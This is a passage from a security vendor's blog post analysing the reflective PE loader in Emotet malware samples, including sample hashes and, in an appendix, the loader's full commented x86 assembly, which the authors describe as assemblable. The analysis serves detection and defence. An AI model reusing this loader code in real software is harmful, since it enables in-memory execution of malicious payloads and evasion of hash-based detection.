Emotetの再帰的ローダーを解析する - FFRIエンジニアブログ

はじめに

この記事では、昨年(2019 年)12 月に、FFRI yarai により検知され、エンドユーザー様からＦＦＲＩに報告された Emotet の複数の検体について、追加的な解析を行った結果を共有します。

Emotetに関して

Emotet は、昨年 11 月 JPCERT/CC から注意喚起がされていることもあり、ＦＦＲＩとしても、過去に検知実績の記事を掲載致しました。

今回の記事では、Emotet の全体的な挙動の中でごく一部の、既存の解析記事では、あまり解説されていない Emotet の PE ローダーの機能に焦点を当てて解説します。

解析対象の検体のハッシュ値(sha256)は以下です。

e39de9f508d54d37a44d30497e8b027722cceed7c28117f8f4c8ff8e7861e2a4
b6fac2fc306b00ca44639f920d084c3414a150588aeefa2f837a5d0e20e9b4b5
b0370ac9c4e3e44b97af1dccdf6a9346734f9bdae76594b0ee4ef9b1c227a3bf

なお、これらの検体は、国内の複数の金融機関や会計事務所で観測され、FFRI yarai で検知された時点での実行ファイルのハッシュ値を示しています。

EmotetのPEローダー

Emotet は、実行ファイルの表層情報が頻繁に更新され、それらのハッシュ値も変化するため、検体のハッシュ値で検知することを難しくしています。また、検体により大量の junk コードが存在する為、単純にファイルを静的解析しても共通した特徴を抽出することは難しいです。今回解析した検体も表層情報は大きく異なっていますが、当然共通する処理があります。ある点に着目すると、その共通する処理の入口部分を上手く捉えることができます。

この 3 検体には、検体自体の内部に含まれる PE ファイルを、独自の PE ローダーでロードし、実行するという処理が含まれていました(3 検体とも、kernel32!VirtualAllocExNuma という関数で PE ローダーのメモリを確保した後、ロード処理が行われていました)。

以下の 3 つの構成要素に分解して比較結果を表 1 にまとめてみます。

外側の PE ファイル(以下、外側 PE と記す)
内側の PE ファイルのローダー(以下、PE ローダーと記す)
内側の PE ファイル(以下、内側 PE と記す)

f:id:FFRI:20211118174243p:image — 表 1 外側 PE・PE ローダー・内側 PE の比較結果

外側 PE とは、Emotet の実行ファイルそれ自体のことです。内側 PE とは、Emotet 自体の内部に存在するもう 1 つの実行ファイルを指します。PE ローダーとは、外側 PE に内包され、内側 PE をメモリ上に展開するコードを指します。

外側 PE が開始
PE ローダーと内側 PE がヒープ上にコピーされる。
PE ローダーが実行される。
PE ローダーが内側 PE をロードし内側 PE が(同一プロセス内で)実行される。

ヒープ上でコードを実行するマルウェアは数多くありますが、Emotet の特徴として、目的となるコードを実行する為に、PE ローダーが介在するという点が挙げられます。さらに、PE ローダーが汎用的な PE をロードできるようになっている為、以下の様な効果をもたらします。

C&C サーバーからの PE 実行ファイルを同一プロセス内(インメモリ)で実行可能
内部 PE のハッシュ検知からの保護
内部 PE の静的解析のコストの増大

これらの特徴が Emotet が Malware-as-a-Service として機能している理由の一部である可能性があります。

今回は、PE ローダーに着目して、その機能を追ってみます。

PE ローダーのバイナリを分析してみると、内側の PE に対して、以下の処理が行われていることがわかります。

Header フォーマットの確認
ImageHeader のロード
セクションから参照される Rawdata のロード
ImportDirectoryEntry から参照される ImageImportDescriptor 内の WindowsAPI のアドレス解決
BaseRelocationTable 内の動的リロケーション処理
各セクションのメモリアクセス属性の変更
エントリーポイントの実行

また、Header フォーマットの解析以前に、ローダー内で使用する WindowsAPI のアドレス解決処理が含まれており、ローダー自体が、メモリ上のアドレスの位置によらず実行可能である様に設計されています。

Windowsのローダーとの比較

ここまで、Emotet の内側 PE を起動するコードを PE ローダーという表現を用いて説明しましたが、ここでは Windows のローダーと Emotet の PE ローダーを比較してみます。

f:id:FFRI:20211118174250p:image — 表 2 Windows のローダーと Emotet の PE ローダーの比較結果

ntdll 内の LdrInitializeThunk 関数は、通常の開発ではあまり使わない関数ですが、ntdll のエントリーポイント上の関数であり、APC(Asynchronous Procedure Call)として、プロセスが開始される前に、カーネル側から毎回実行されます。処理自体は上に挙げた処理の他にも様々な処理があり、ntdll!LdrInitializeThunk から先のコードを静的解析することで理解することができます。

Windows のローダーと比較した特徴として、Emotet の PE ローダーは、

実行対象を別プロセスとして実行する訳ではないので、カーネル内で行われる処理をする必要がある。
動的リロケーションを必要とするプログラムの実行も可能とする。

当然、TLSCallback の呼び出しや例外エントリーの登録等、ntdll 内のローダーには存在するが、Emotet のローダーに存在しないものは、処理が行われません。また、通常起動時に確認が行われる OptionalHeader 内の多くのパラメーターも Emotet のローダーは無視します。例えば、Emotet が C&C サーバーと通信することで獲得する検体に、DLL 形式のものがありますが、このローダーの場合、DLL 形式の PE ファイルであっても通常の EXE 形式の PE ファイルと同じ様に起動されます。

再帰的PEローダーに関して

このロード手法は、Reflective(再帰的) PE Loader と呼ばれ、Emotet 以外にも Gandcrab、Trickbot、その他多数のマルウェアで使用された手法のようです。また、この手法は、任意の PE を実行できるという意味で、(圧縮されることはありませんが、)パック手法の一部として分類されることもあるようです。

この手法についての紹介資料の参照を以下に添付します。

[1] ReflectivePELoader の BlackHat2016 発表資料, https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf, 閲覧日:2020/03/04

[2] ReflectivePELoader のコードのまとめ, https://github.com/BenjaminSoelberg/ReflectivePELoader , 閲覧日:2020/03/04

まとめ

この記事では、Emotet の PE ローダーについて、まとめました。Emotet の PE ローダーの詳細な解説に興味のある方は、このブログの付録 1 に添付してある、今回の検体の PE ローダー部分のコードをアセンブリのコードとして切り出し、コメントを加えたものをご確認下さい。

今回は、ローダーのみの解説となりましたが、Emotet の PE ローダーが C&C サーバーとの通信により取得する新しいバージョンの自身のマルウェアや、別のマルウェアの実行に関与していると考えられます。

また、今回は、報告のあった 3 検体を中心に解析しましたが、Emotet には他にも様々な亜種が存在し、様々な角度から、包括的に調査をすることで、新たな発見があると思われます。

付録1<ローダーのアセンブリコードとコメント>

今回分析した検体に共通して見られた PE ローダーのコードにコメントを加えて下記に掲載しました。なお、プログラム自体はそれ自体は悪性のものではなく、ダウンロード、(NASM による)コンパイルも可能です。

▶ソースコードを展開する

   section .text
    global load
    
load:
    ;; 次の命令をcallすることでstack[esp]上に現在のeipを格納
    call    _05
_05:
    ;; [esp]の値を取得することで、現在(このpop命令の手前)のInstruction Pointer
    ;; を取得
    pop     eax
    mov     ebx,eax
    ;; 0x53AはこのPEローダの長さだと思われる
    :: (この値が即値指定のため、ローダのコードにあまり変更がないと考えられる)
    ;; PEローダの後に、ロードされるPEが存在する事を想定し、その先頭をポイントする。
    add     eax,53Ah
    ;; PEローダとロードされたPEの確保されたHeapの大きさは、0x11000であった。
    ;; そのため、この0x1093hは確保された領域のかなり後ろを指す。
    add     ebx,1093Ah

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; 引数の用意
;;; 5つの引数が設定される
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    ;; この引数の下位1bitが立っていると、ImageDosHeaderが0埋めされる
    push    1
    push    5
    push    ebx
    ;; daveと書かれた文字列を指す(目的不明)
    push    30627745h
    ;; 第1引数がImageの先頭のアドレス([esp+0x5c])
    push    eax
    call    _2d
    ;; ここは到達するか不明
    add     esp,14h
    ret
    
_2d:
    sub     esp,48h
    and     dword [esp+18h],0
    mov     ecx,726774Ch
    push    ebx
    push    ebp
        push    esi
    push    edi
        xor     esi,esi

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;ローダ内で使用するWindowsAPIのアドレスを解決
;;; 6つの関数のアドレスが解決される
;;; 解決したアドレスはスタックやレジスタに退避される
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ;; kernel32!LoadLIbrary
    call    _467
    mov     ecx,7802F749h
        mov     dword [esp+1Ch],eax
    ;; kernel32!GetProcAddress
    call    _467
    mov     ecx,0E553A458h
        mov     dword [esp+20h],eax
    ;; kernel32!VirtualAlloc
    call    _467
    mov     ecx,0C38AE110h
        mov     ebp,eax
    ;; kernel32!VirtualProtect
    call    _467
    mov     ecx,945CB1AFh
        mov     dword [esp+2Ch],eax
    ;; ntdll!NtFlushInstructionCache
    call    _467
    mov     ecx,959E0033h
        mov     dword [esp+30h],eax
    ;; kernel32!GetNativeSystemInfo
    call    _467
    mov     ebx,eax

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; ImageHeaderの確認処理
;;; 処理としては、Section内のRawDataのサイズがOptionalHeaderのImageSize
;;; と一致しているか確認する為の処理が大部分を示す。
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ;; [esp+5ch] == ロードするImageの先頭アドレス  
    mov     eax,dword [esp+5Ch]
    ;; IMAGE_DOS_HEADER.e_lfanew取得
    mov     edi,dword [eax+3Ch]
    ;; IMAGE_NT_HEADERS先頭アドレス
    add     edi,eax
    mov     dword [esp+10h],edi
    ;; IMAGE_NT_HREADERS.Signature == 0x4550の確認
    cmp     dword [edi],4550h
    je      _a7
_a0:
    xor     eax,eax
    jmp     _45f
_a7:
    mov     eax,14Ch
    ;; IMAGE_FILE_HEADER.Machine == 0x14Cの確認
    ;; -> 32bitコードであるか
    cmp     word [edi+4],ax
    jne     _a0
    ;; SectionAlignment(0x18 + 0x20)の最左byteがが1であるか確認
    ;; e.g. 0x1000,0x2000
    test    byte [edi+38h],1
    jne     _a0
    ;; IMAGE_FILE_HEADER.Sectionの取得
    movzx   edx,word [edi+6]
    ;; IMAGE_FILE_HEADER.SizeOfOptionalHeaderの取得
    movzx   eax,word [edi+14h]
    test    edx,edx
    je      _e6
    ;; IMAGE_NT_HEADER + 0x24 + SizeOfOptionalHeader
    ;; 0x18 = 0x4(IMAGE_NT_HEADER.Signature) + 0x14(IMAGE_FILE_HEADER)
    ;; 0x24 - 0x18 == 0x0c
    ;; Alignmentがズレていない限り、ImageOptionalHeaderのすぐ後に、
    ;; ImageSectionHeaderが開始される。
    ;; この場合ImageSectionHeaderの+0x0cにある属性、仮想アドレスのアドレスを指す  
    lea     ecx,[edi+24h]
    add     ecx,eax
_c9:
    ;; SizeOfRawData( = IMAGE_SECTION_HEADER.VirtualAddress + 0x4)
    ;; が0であるか確認
    cmp     dword [ecx+4],0
    ;; VirtualAddressの取得
    mov     eax,dword [ecx]
    jne     _d6
    ;; SectionAlignmentの加算
    add     eax,dword [edi+38h]
    jmp     _d9
_d6:
    ;; SizeOfRawDataの加算
    add     eax,dword [ecx+4]
_d9:
    ;; eaxとesiが異なる場合、esi = eaxとする。
    ;; esiの初期値は0である
    cmp     eax,esi
    cmova   esi,eax
    add     ecx,28h
    ;; Section数を指しているedxをデクリメント
    ;; 0でない場合、_c9に遷移
    sub     edx,1
    jne     _c9

_e6:
    ;; ここに至る時点で、esiに全てのセクションのサイズの合計値が入っている
    lea     eax,[esp+34h]
    push    eax
    ;; kernel32!GetNativeSystemInfo
    call    ebx
    ;; SystemInfo.dwPageSizeを参照
    mov     eax,dword [esp+38h]
    ;; ImageOptionalHeader.SizeOfImage取得
    mov     ebx,dword [edi+50h]
    ;; dwPageSize-1をコピー
    lea     edx,[eax-1]
    lea     ecx,[eax-1]
    ;; bit反転(ページサイズで割れるアドレスの算出の為)
    not     edx
    dec     eax
    ;; esi(全セクションのサイズ合計)をページサイズ-1に足す
    add     ecx,esi
    ;; SizeOfImageにページサイズ-1を足す
    add     eax,ebx
    ;; ページサイズでmod
    and     ecx,edx
    and     eax,edx
    ;; OptionalHeaderのSizeOfImageと、SectionHeaderを巡回して算出したImageSize
    ;; を比較し、それらが異なる場合、実行しない
    cmp     eax,ecx
    jne     _a0


;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; 実行ファイルの仮想アドレスを確保する
;;; ここでは、各セクションのメモリの属性を考慮せず、IMAGE_READ_WRITEとして
;;; 確保する
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    push    4
    push    3000h
    ;; ebxには1つ前の処理により確保すべきImageの大きさが入っている    
    push    ebx
    push    0
    ;; kernel32!VirtualAlloc
    call    ebp

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; ImageHeaderの領域分(SizeOfHeadersの大きさ)を確保した領域にコピーする。
;;; ただし、先頭からImageNtHeadersまでのバイトに関しては、コピーではなく、0が格納される。
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
        
    ;; OptionalHeader.SizeOfHeaders
    mov     esi,dword [edi+54h]
    mov     ebx,eax
    ;; ロードするPEの先頭アドレス
    mov     eax,dword [esp+5Ch]
    xor     ecx,ecx
    mov     dword [esp+14h],eax
    ;; コピー先:edx
    mov     edx,ebx
    xor     eax,eax
    mov     dword [esp+18h],ebx
    inc     eax
    mov     dword [esp+24h],eax
    ;; SizeOfHeadersが0の場合この処理は行わない
    test    esi,esi
    je      _16c
    ;; このスタック上の値は、ローダの先頭付近で与えられた引数の1つで1が格納されている
    mov     ebp,dword [esp+6Ch]
    ;; コピー元:ebx
    mov     ebx,dword [esp+14h]
    ;; eaxには1が格納されており、ebpの元となった引数の0x1bitが立っていない場合、
    ;; 0コピーではなく、通常通りのコピーが行われる
    and     ebp,eax
_13f:
    ;; ここからコピー処理に入る。
    ;; 1byteずつコピーし、その度に、SizeOfHeadersの値をデクリメントし、
    ;; その値が0になったら終了する
    dec     esi
    test    ebp,ebp
    je      _15d
    mov     eax,edi
    sub     eax,dword [esp+5Ch]
    cmp     ecx,eax
    jae     _15d
    cmp     ecx,3Ch
    jb      _158
    cmp     ecx,3Eh
    jbe     _15d
_158:
    ;; コピー先に1byteの0を格納
    mov     byte [edx],0
    jmp     _161
_15d:
    ;; コピー元から1byte取得し、コピー先に格納
    mov     al,byte [ebx]
    mov     byte [edx],al
_161:
    ;; コピー処理のindexをインクリメント
    inc     ecx
    ;; コピー元のアドレスをインクリメント
    inc     ebx
    ;; コピー先のアドレスをインクリメント
    inc     edx
    test    esi,esi
    ;; SizeOfHeaderがまだ残っていたら引き続きこの処理を続ける
    jne     _13f
    
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; Section内のRawDataのコピーを行う
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    mov     ebx,dword [esp+18h]
_16c:
    ;; eax = NumberOfSections
    movzx   eax,word [edi+6]
    ;; ecx = SizeOfOptionalHeaders
    movzx   ecx,word [edi+14h]
    ;; NumberOfSections == 0だったらこの処理は行わない
    test    eax,eax
    je      _1b0
    ;; ecxが0x2c + OptionalHeaderを指す。
    ;; 1つの目のSectionHeaderの+0x14(0x2c-0x18),PointerToRawDataを指す.    
    add     edi,2Ch
    add     ecx,edi
    mov     edi,dword [esp+5Ch]

_181:
    ;; edx = ImageSectionHeader.VirtualAddress
    mov     edx,dword [ecx-8]
    ;; 残りのセクション数をデクリメント
    dec     eax
    ;; esi = PointerToRawData
    mov     esi,dword [ecx]
    ;; コピー先の先頭アドレス
    add     edx,ebx
    ;; ebp = SizeOfRawData
    mov     ebp,dword [ecx-4]
    ;; ediはPEの先頭を指しており、実際のデータ領域をesiは指す
    add     esi,edi
    mov     dword [esp+5Ch],eax
    test    ebp,ebp   
    je      _1a5
_196:
    ;; esi(実際のPEの開始アドレス+PointerToRawData/コピー元)から
    ;; edx(コピー先の先頭アドレス+VirtualAddress/コピー先)へコピー
    mov     al,byte [esi]
    mov     byte [edx],al
    ;; コピー先のアドレスをインクリメント
    inc     edx
    ;; コピー元のアドレスをインクリメント
    inc     esi
    ;; ebpに格納された残りのSizeOfRawDataが0になっていたら終了
    sub     ebp,1
    jne     _196
    
    mov     eax,dword [esp+5Ch]
_1a5:
    add     ecx,28h
    ;; 残りのSection数が0なら終了
    test    eax,eax
    jne     _181

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; ImageImportDescriptor内のWindowsAPIのアドレスの解決を行う
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    mov     edi,dword [esp+10h]
_1b0:
    ;; 0x80 = 0x18 + ImageOptionalHeader(0x60) + 0x8(ImageExportDirectory)
    ;; ImageDirectoryEntryImportのVirtualAddressを指す
    mov     esi,dword [edi+80h]
    ;; ロード先のImageImportDescriptorのアドレスを算出
    add     esi,ebx
    mov     dword [esp+14h],esi
    ;; ImageImportDescriptor+0xcよりName(IATへのポインタ)を取得
    mov     eax,dword [esi+0Ch]
    ;; 0ならばImport関数の解決は不要
    test    eax,eax
    je      _240
    ;; ロード先のBaseAddressを考慮
_1c3:    
    add     eax,ebx
    push    eax
    ;; LoadLibraryを呼び出す
    call    dword [esp+20h]
    ;; FirstThunkの確認
    mov     ebp,dword [esi+10h]
    mov     edi,eax
    mov     eax,dword [esi]
    add     ebp,ebx
    add     eax,ebx
    mov     dword [esp+5Ch],eax
    cmp     dword [ebp],0
    je      _22e
    mov     esi,dword [esp+20h]
_1e3:
    mov     ecx,dword [eax]
    test    ecx,ecx
    je      _207
    jns     _207
    mov     eax,dword [edi+3Ch]
    movzx   ecx,cx
    mov     eax,dword [eax+edi+78h]
    sub     ecx,dword [eax+edi+10h]
    mov     eax,dword [eax+edi+1Ch]
    lea     eax,[eax+ecx*4]
    mov     eax,dword [eax+edi]
    add     eax,edi
    jmp     _213
_207:
    mov     eax,dword [ebp]
    add     eax,2
    add     eax,ebx
    push    eax
    push    edi
    ;; GetProcAddressを呼び出す
    call    esi
_213:
    mov     dword [ebp],eax
    add     ebp,4
    mov     eax,dword [esp+5Ch]
    add     eax,4
    mov     dword [esp+5Ch],eax
    cmp     dword [ebp],0
    ;; 次のImageThunkDataを確認
    jne     _1e3
    mov     esi,dword [esp+14h]
_22e:
    mov     eax,dword [esi+20h]
    add     esi,14h
    mov     dword [esp+14h],esi
    test    eax,eax
    ;; 次のImageImportDescriptorを確認
    jne     _1c3

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; 動的リロケーション(BaseRelocエントリの処理)を行う
;;; 基本的に二重ループになっており、
;;; 複数のBlockの巡回処理、Block内の巡回処理が存在する。
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    mov     edi,dword [esp+10h]
_240:    
    mov     ebp,ebx
    ;; ebp = ImageBase
    sub     ebp,dword [edi+34h]
    ;; 0xa4 = (0x18 + 0x60 + 0x8 * 5)
    ;; 6個目のImageDirectoryEntryのSizeを計算している。
    ;; つまり、ImageDirectoryEnetyBaseRelocのそれである。
    cmp     dword [edi+0A4h],0
    ;; 仮に、Sizeが0ならこの処理は行わない
    je      _2fc
    ;; BaseRelocのVirtualAize(ロード先のアドレス)を計算
    mov     edx,dword [edi+0A0h]
    add     edx,ebx
    mov     dword [esp+5Ch],edx
    ;; ecxにはロード先の先頭アドレス+BaseRelocのVirtualAddressを格納
    ;; この値にOffsetを足し合わせたアドレスが書き換え対象となる
    lea     ecx,[edx+4]
    mov     eax,dword [ecx]
    mov     dword [esp+14h],ecx
    test    eax,eax
    je      _2fc
_26f:    
    mov     esi,dword [edx]
    lea     edi,[eax-8]
    add     esi,ebx
    lea     eax,[edx+8]
    shr     edi,1
    mov     dword [esp+20h],eax
    je      _2e1
    push    2
    mov     ebx,eax
    pop     edx
;;; 同一Block内のtype+offsetを巡回する
_286:
    movzx   ecx,word [ebx]
    dec     edi
    mov     ax,cx
    shr     ax,0Ch
    cmp     ax,0Ah
    je      _29d
    cmp     ax,3
    jne     _2a8
;; ******************************************************************
_29d:
    and     ecx,0FFFh
    ;; Type == 3(IMAGE_REL_BASED_HIGHLOW)の時、ebpを足し合わせ
    add     dword [ecx+esi],ebp
;; *******************************************************************
    jmp     _2cf
_2a8:
    cmp     ax,word [esp+24h]
    jne     _2c0
    and     ecx,0FFFh
    mov     eax,ebp
    shr     eax,10h
    ;; Type == 1(IMAGE_REL_BASED_HIGH) high bitのみ足し合わせる為、
    ;; shift rightしてから足し合わせ
    add     word [ecx+esi],ax
    jmp     _2cf
_2c0:
    cmp     ax,dx
    jne     _2cf
    and     ecx,0FFFh
    ;; Type == 2(IMAGE_REL_BASED_LOW) row bitのみ足す  
    add     word [ecx+esi],bp
_2cf:
    ;; type+offset == 2byteのため、2を足す
    add     ebx,edx
    test    edi,edi
    ;; SizeOfBlockが0にならない限り、type+offsetを巡回する
    jne     _286
    
    mov     ebx,dword [esp+18h]
    mov     edx,dword [esp+5Ch]
    mov     ecx,dword [esp+14h]
_2e1:
    add     edx,dword [ecx]
    mov     dword [esp+5Ch],edx
    lea     ecx,[edx+4]
    mov     eax,dword [ecx]
    mov     dword [esp+14h],ecx
    test    eax,eax
    ;; 残りのBlockが存在する場合、再度巡回する
    jne     _26f

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; Sectionのメモリ属性を変更
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    mov     edi,dword [esp+10h]
    
_2fc:
    ;; SectionSizeとSizeOfOptionalHeader
    movzx   eax,word [edi+6]
    movzx   ecx,word [edi+14h]
    test    eax,eax
    je      _3c3
    mov     esi,dword [esp+5Ch]
    lea     ebp,[edi+3Ch]
    add     ebp,ecx
_315:    
    dec     eax
    cmp     dword [ebp-14h],0
    mov     dword [esp+24h],eax
    jbe     _3b8
    mov     ecx,dword [ebp]
    xor     edx,edx
    inc     edx
    mov     eax,ecx
    shr     eax,1Dh
    and     eax,edx
    mov     edx,ecx
    shr     edx,1Eh
    and     edx,1
    shr     ecx,1Fh
    test    eax,eax
    jne     _358
    jne     _34b
    push    8
    pop     esi
    push    1
    jmp     _350
_34b:
    push    4
    pop     esi
    push    2
_350:
    test    ecx,ecx
    pop     eax
    cmove   esi,eax
    jmp     _384
_358:
    test    edx,edx
    jne     _373
    test    ecx,ecx
    jne     _364
    push    10h
    jmp     _379
_364:    
    test    edx,edx
    jne     _373
    test    ecx,ecx
    je      _384
    mov     esi,80h
    jmp     _384
_373:    
    test    ecx,ecx
    jne     _37c
    push    20h
_379:    
    pop     esi
    jmp     _384
_37c:
    push    40h
    test    ecx,ecx
    pop     eax
    cmovne  esi,eax
_384:
    mov     ecx,dword [ebp]
    mov     eax,esi
    or      eax,200h
    and     ecx,4000000h
    cmove   eax,esi
    lea     eax,[esp+28h]
    push    eax
    mov     eax,dword [ebp-18h]
    push    esi
    push    dword [ebp-14h]
    add     eax,ebx
    push    eax
    ;; VirtualProtectを呼び出す
    call    dword [esp+3Ch]
    test    eax,eax
    je      _a0
    mov     eax,dword [esp+24h]
_3b8:    
    add     ebp,28h
    test    eax,eax
    jne     _315

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; EntryPointの実行
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

_3c3:
    ;; esi = entrypoint
    mov     esi,dword [edi+28h]
    push    0
    push    0
    push    0FFFFFFFFh
    add     esi,ebx
    ;; NtFlushInstructionCacheを呼び出す
    call    dword [esp+3Ch]
    xor     eax,eax
    inc     eax
    push    eax
    push    eax
    push    ebx
    ;; entrypointの実行
    call    esi
        ;; entrypoint実行後の処理
    cmp     dword [esp+60h],0
    je      _45d
    cmp     dword [edi+7Ch],0
    je      _45d
    mov     ecx,dword [edi+78h]
    add     ecx,ebx
    mov     eax,dword [ecx+18h]
    test    eax,eax
    je      _45d
    cmp     dword [ecx+14h],0
    je      _45d
    mov     ebp,dword [ecx+20h]
    mov     edi,dword [ecx+24h]
    add     ebp,ebx
    and     dword [esp+5Ch],0
    add     edi,ebx
    test    eax,eax
    je      _45d
_40c:
    mov     esi,dword [ebp]
    add     esi,ebx
    xor     edx,edx
_413:    
    movsx   eax,byte [esi]
    ror     edx,0Dh
    add     edx,eax
    inc     esi
    cmp     byte [esi-1],0
    jne     _413
    cmp     dword [esp+60h],edx
    je      _43e
    mov     eax,dword [esp+5Ch]
    add     ebp,4
    inc     eax
    add     edi,2
    mov     dword [esp+5Ch],eax
    cmp     eax,dword [ecx+18h]
    jb      _40c
    jmp     _45d
_43e:
    movzx   edx,word [edi]
    cmp     edx,0FFFFFFFFh
    je      _45d
    mov     eax,dword [ecx+1Ch]
    push    dword [esp+68h]
    push    dword [esp+68h]
    lea     eax,[eax+edx*4]
    mov     eax,dword [eax+ebx]
    add     eax,ebx
    call    eax
    pop     ecx
    pop     ecx
_45d:    
    mov     eax,ebx
_45f:    
    pop     edi
    pop     esi
    pop     ebp
    pop     ebx
    add     esp,48h
    ret

;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; GetProcAddress相当の役割を示すと思われる
;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

_467:    
    sub     esp,10h
    mov     eax,[fs:30h]
    push    ebx
    push    ebp
    push    esi
    mov     eax,dword [eax+0Ch]
    push    edi
    mov     dword [esp+18h],ecx
    mov     esi,dword [eax+0Ch]
    jmp     _50d
_483:    
    mov     eax,dword [esi+30h]
    xor     ecx,ecx
    mov     ebx,dword [esi+2Ch]
    mov     esi,dword [esi]
    mov     dword [esp+14h],eax
    mov     eax,dword [edx+3Ch]
    mov     ebp,dword [eax+edx+78h]
    mov     dword [esp+10h],ebp
    test    ebp,ebp
    je      _50d
    shr     ebx,10h
    xor     edi,edi
    test    ebx,ebx
    je      _4c8
    mov     ebp,dword [esp+14h]
_4ad:    
    mov     al,byte [edi+ebp]
    ror     ecx,0Dh
    cmp     al,61h
    movsx   eax,al
    jl      _4bd
    add     ecx,0FFFFFFE0h
_4bd:    
    add     ecx,eax
    inc     edi
    cmp     edi,ebx
    jb      _4ad
    mov     ebp,dword [esp+10h]
_4c8:    
    mov     eax,dword [edx+ebp+20h]
    xor     ebx,ebx
    mov     edi,dword [edx+ebp+18h]
    add     eax,edx
    mov     dword [esp+14h],edi
    test    edi,edi
    je      _50d
_4dc:    
    mov     ebp,dword [eax]
    xor     edi,edi
    add     ebp,edx
    add     eax,4
    mov     dword [esp+1Ch],eax
_4e9:    
    movsx   eax,byte [ebp]
    ror     edi,0Dh
    add     edi,eax
    inc     ebp
    cmp     byte [ebp-1],0
    jne     _4e9
    lea     eax,[edi+ecx]
    cmp     eax,dword [esp+18h]
    je      _522
    mov     eax,dword [esp+1Ch]
    inc     ebx
    cmp     ebx,dword [esp+14h]
    jb      _4dc
_50d:    
    mov     edx,dword [esi+18h]
    test    edx,edx
    jne     _483
    xor     eax,eax
_51a:    
    pop     edi
    pop     esi
    pop     ebp
    pop     ebx
    add     esp,10h
    ret

_522:    
    mov     esi,dword [esp+10h]
    mov     eax,dword [esi+edx+24h]
    lea     eax,[eax+ebx*2]
    movzx   ecx,word [eax+edx]
    mov     eax,dword [esi+edx+1Ch]
    lea     eax,[eax+ecx*4]
    mov     eax,dword [eax+edx]
    add     eax,edx
    jmp     _51a

付録2<動的リロケーション>

Emotet の PE ローダーの動的リロケーション処理とそれを解析に応用した事例を紹介します。なお、説明の対象として、命令セットアーキテクチャが x86 の場合を対象としており、x86-64 の場合は対象外です。

Visual Studio 等の開発環境で、マイクロソフト製のコンパイラ、リンカーを用いて開発されたプログラムの場合、既定では、ImageOptionalHeader の ImageDirectoryEntry に、BaseRelocationTable が存在し、その仮想アドレスが.reloc セクションの Rawdata をメモリ上参照します。このテーブルは、図 1 のように、単一または複数のブロックで構成され、1 つのブロックには、仮想アドレスとブロックのサイズ、そして、ブロックのサイズにあった個数のタイプとオフセットのペアで構成されています。テーブルに、複数のブロックが存在する場合は、リロケーション対象の範囲が 0x1000 以上の場合です。オフセットが 3byte のみしか表現できない為、任意のアドレスを表現するために、0x1000 毎にベースとなるアドレスを設ける必要があり、ブロックは、ベースアドレスを共有する単位となります。タイプにより個々の処理は少しづつ異なりますが、ここでは、最も一般的なケース(タイプ == IMAGE_REL_BASED_HIGHLOW)の場合を紹介します。

f:id:FFRI:20211118174259p:image — 図 1 BaseRelocationTableの構造

処理としては、以下のように、外側のループで個々のブロックを巡回し、個々のタイプとオフセットを巡回するという二重ループになります。

内側のループ内で、ロード先の先頭アドレスに、個々のブロックに定められた仮想アドレスと個々のオフセットを足したアドレスの値を参照します。
そのアドレスの値に、プログラムが本来ロードされる予定であったアドレスと実際のアドレスの差異を足します。
その値を 1 でアクセスした同一のアドレスに格納します。

アセンブリ言語で表現すると以下の様になります。

eax : 書き換えを行うコードが存在する先頭アドレス(0x1000単位)
edi : オフセット

ebp : 実際にプログラムがロードされるアドレス - OptionalHeader上のImageBase 

add [eax+edi], ebp

この様な処理が必要な理由は以下が挙げられます。

静的リンカーが定めた仮想アドレス上にプログラムが必ずしもロードされるとは限らない
仮想アドレスを即値指定する命令が多数存在する(x86 の場合)

